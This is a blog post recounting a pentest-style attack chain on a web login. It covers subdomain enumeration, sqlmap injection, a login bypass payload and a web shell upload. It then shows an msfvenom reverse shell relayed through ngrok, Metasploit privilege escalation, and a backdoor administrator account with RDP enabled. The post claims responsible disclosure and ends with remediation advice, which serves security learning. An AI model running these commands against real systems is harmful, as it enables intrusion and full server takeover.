Disclaimer: This article is for educational purposes only. The techniques described should only be used on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.

Hi, how are you guys? I hope you are fine. This is my first article of the month, I hope you enjoy it.

All of this started when my friend wanted to learn through the website and I thought "hmm, interesting, let's start this one". The journey from initial reconnaissance to gaining full administrator access on a Windows server demonstrates how a simple SQL injection can escalate into complete system compromise.

SQL Injection Attack

SQL injection vulnerability leading to server compromise

Initial Reconnaissance and Subdomain Enumeration

First, I enumerated subdomains using amass and subfinder with help of tools made by tomnomnom, namely anew.

# Subdomain enumeration with multiple tools
amass enum -d site.com -passive | anew subs.txt && subfinder -d site.com -silent | anew subs.txt

After that, I used httpx to filter active domains with the following command:

# Filter active domains with 200 status code
cat subs.txt | httpx -mc 200 -o 200-subs.txt
Subdomain Enumeration

Subdomain enumeration and active domain filtering

Since there were only a few active domains, I opened each one in the browser one by one, and I came across a login page.

SQL Injection Discovery

I tried entering a single quote (') in the login form and it displayed an error message - a clear indication of a potential SQL injection vulnerability.

SQL Error Message

SQL error message revealing injection vulnerability

I immediately used SQLmap to perform injection with the following command:

sqlmap -u "https://www.site.com/login" --data="username=a&password=b" --random-agent --tamper=space2comment --level 3 --risk 3 --dbs

After waiting for a while, I obtained several databases, confirming the SQL injection vulnerability.

SQL Error Message

SQL error message revealing injection vulnerability

Database Administrator Privileges

Then I tried to see if my user had DBA (Database Administrator) privileges with the following command:

sqlmap -u "https://www.site.com/login"
--data="username=a&password=b"--random-agent --tamper=space2comment --level 3 --risk 3 --is-dba
SQL Error Message

SQL error message revealing injection vulnerability

Critical Finding: Yes, I obtained the root user privileges! This meant I had full database administrative access.

Attempting OS Shell Access

I then tried using the following command to get an OS shell:

sqlmap -u "https://www.site.com/login" --data="username=a&password=b" --random-agent --tamper=space2comment --level 3 --risk 3 ;--os-shell

Unfortunately, I didn't get a backconnect through SQLmap. I really wanted to dump the data, but it wasn't allowed due to security restrictions.

Authentication Bypass and Shell Upload

Back to the login form, I tried bypassing it by using a classic SQL injection payload '=''or' and unexpectedly, I managed to log in successfully.

I quickly proceeded to upload a web shell, and it was successful. However, all the directories appeared in red color, indicating restricted permissions.

SQL Error Message

Not Allowed Permission

I wondered in my mind, "Can I obtain the administrator user?" I decided to try using Metasploit and Ngrok for establishing a reverse connection.

Reverse Shell Setup and Privilege Escalation

I opened a terminal and started ngrok with the following command:

ngrok tcp 1337
SQL Error Message

SQL error message revealing injection vulnerability

Then, I created a payload for backconnect because this website uses a Windows server. I created it using the following command:

# Generate Windows Meterpreter payload
msfvenom -p windows/meterpreter/reverse_tcp lhost=<ngrok-host-without-tcp://> lport=<ngrok-port> -f exe -o back.exe
Payload Generation

Generating Windows Meterpreter payload with msfvenom

After that, I ran Metasploit and used the following commands:

# Metasploit handler setup
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 1337
exploit
SQL Error Message

SQL error message revealing injection vulnerability

After everything was running, it was time to upload the previously created payload using the backdoor shell. Then, I used the "command" feature available in the backdoor shell to execute the payload I created by typing its name:

back.exe
SQL Error Message

back.exe

Success: Back to Metasploit, I successfully obtained a reverse connection!

SQL Error Message

Success back connect

Privilege Escalation to Administrator

I used the "shell" command to gain access to the command prompt (CMD), and then I checked my current user privileges:

# Check current user privileges
whoami
# Output: nt authority\network service (not administrator)
SQL Error Message

Output user

I was running as a limited service account. I went back to Meterpreter with the "exit" command and ran privilege escalation:

# Privilege escalation commands
getsystem
getuid

BOOM! I successfully obtained Administrator privileges on the Windows server!

Administrator Access

Successfully escalated privileges to Administrator level

Post-Exploitation and RDP Access

After gaining Administrator privileges, I created a new user account and accessed RDP (Remote Desktop Protocol) to demonstrate complete control over the server.

# Create new administrator user
net user hacker P@ssw0rd123 /add
net localgroup administrators hacker /add

# Enable RDP if needed
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
RDP Access

Remote Desktop Protocol access confirming full server control

Impact Assessment

The successful exploitation demonstrated several critical security issues:

  • SQL Injection: Unvalidated user input allowing database access
  • Weak Authentication: Bypassable login mechanisms
  • File Upload Vulnerability: Unrestricted file upload allowing malicious payloads
  • Privilege Escalation: Service account with exploitable system privileges
  • Complete System Compromise: Full Administrator access achieved

Responsible Disclosure and Rewards

I immediately reported my findings to the affected organization. The comprehensive nature of the vulnerability chain and the potential for complete system compromise warranted urgent attention.

Recognition: As a result of the bugs I discovered, I received several acknowledgments and rewards since they encompassed multiple websites and demonstrated critical security flaws.

Remediation Recommendations

To prevent similar attacks, organizations should implement:

  • Input Validation: Proper sanitization of all user inputs
  • Parameterized Queries: Use prepared statements to prevent SQL injection
  • Principle of Least Privilege: Database users should have minimal necessary permissions
  • File Upload Security: Strict validation and sandboxing of uploaded files
  • System Hardening: Regular security updates and privilege restrictions
  • Network Segmentation: Limit the impact of compromised systems

Conclusion

This engagement demonstrated how a single SQL injection vulnerability can lead to complete system compromise when combined with other security weaknesses. The attack chain progression from initial reconnaissance to full Administrator access highlights the importance of defense in depth and comprehensive security testing.

For penetration testers and security researchers, this case study emphasizes the value of systematic exploitation and the potential for escalation when multiple vulnerabilities are chained together effectively.

Maybe that's all from me, hopefully it can be a reference for you. I'm RyuuKhagetsu, see you in next article.

Tags:

#SQLInjection #DatabaseSecurity #PrivilegeEscalation #Metasploit #WindowsSecurity #PenetrationTesting #ReverseShell #ServerCompromise